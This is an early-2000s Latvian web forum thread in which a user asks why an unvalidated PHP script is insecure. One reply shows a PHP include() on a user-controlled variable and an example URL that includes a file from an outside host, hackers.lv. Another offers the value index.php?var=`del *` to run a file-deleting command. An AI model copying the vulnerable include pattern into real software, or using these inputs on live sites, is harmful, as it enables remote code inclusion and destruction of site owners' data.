liicis Posted September 18, 2003 Report Posted September 18, 2003 lasot aprakstu vienam skriptam, beigas bija rakstits ka tas nav dros jo nav aizsardziba pret nekorektiem mainigiem????ko tas nozime? tomer man nav skaidribas ka notiek uzlausana?jo ja skripts nolasa mainigo(vardu) un cita vieta to attelo. kads mainigo atmin un ta vieta ievieto citu vertibu-ta tik un ta paliks vertiba, un kas no ta var mainities? jakads savu vardu negrib ierakstit attiecigaja laucina bet gan atrast mainigo un tam pieskirt mainiga vertibu? kur seit ir drosibas kluda un kam vajadzigas parbaudes?
Little_Hacker Posted September 18, 2003 Report Posted September 18, 2003 paarbaudes vajag vienmeer.. viena no kljuudaam ir ja include() lieto mainiigo.. piem shaadi ~ <code><font color="#000000"> <font color="#0000CC"><?php </font><font color="#006600">if (!</font><font color="#0000CC">$include</font><font color="#006600">) { include(</font><font color="#CC0000">'jaunumi.txt'</font><font color="#006600">); } else { include(</font><font color="#0000CC">$include</font><font color="#006600">); } </font><font color="#0000CC">?> </font> </font> </code> sho skriptu mees varam 'piechakareet' aiz mainiigaa padodot kaut kaadu citu adresi .. piem www.tavalapa.lv/?include=http://www.hackers.lv/index.php .. tadejaadi mees inkluudosim hackers.lv lapas index failu tavaa lapaa.. bet te var izmantot citaadus 'exploiitus' lai to visu varetu pachakaret.. piem parstaigaat direktorijas, maybe uzzinaat paroles un tml ..
Little_Hacker Posted September 18, 2003 Report Posted September 18, 2003 aaa nu pa to mainiigo ($vards) .. ja tu vinju padod no kaadas formas tad enivej es varu redzeet kaads mainiigais tiek padots, vienkaarshi apstoties lapas sourcee input laucinja neimu :)
Venom Posted September 18, 2003 Report Posted September 18, 2003 A man patīk likt kautko līdzīgu' index.php?mainīgais=`del *` dāžreiz nostrādā.
Recommended Posts